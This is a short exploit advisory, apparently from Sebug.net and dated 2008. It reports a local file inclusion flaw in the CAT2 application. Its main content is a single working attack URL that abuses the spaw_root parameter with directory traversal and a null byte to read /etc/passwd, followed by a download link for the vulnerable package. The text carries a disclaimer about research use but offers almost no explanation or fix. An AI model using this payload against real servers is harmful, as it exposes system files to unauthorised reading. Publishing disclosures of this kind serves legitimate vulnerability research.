CAT2 (spaw_root) Local File Inclusion Vulnerability

SEBUGID:SSD-20080704001

Published:2008-07-01

Exploit:

[www.sebug.net]
The following procedures (methods) may contain something offensive，they are only for security researches and teaching , at your own risk!

@~~===========================================~~@

|  Author => StAkeR ~ StAkeR@hotmail.it         |  

@~~===========================================~~@ 

+                                                

@~~==========================================================================~~@

|  CAT2 <= 1.Local File Inclusion Vulnerability                                |

@~~==========================================================================~~@

|  objects/extern/spaw/spaw_control.class.php?spaw_root=../../etc/passwd%00    |

@~~==========================================================================~~@

+

@~~====================================================~~@

|  http://downloads.sourceforge.net/cat-2/CAT2-1_2.zip   |               

@~~====================================================~~@

// Sebug.net [ 2008-07-02 ]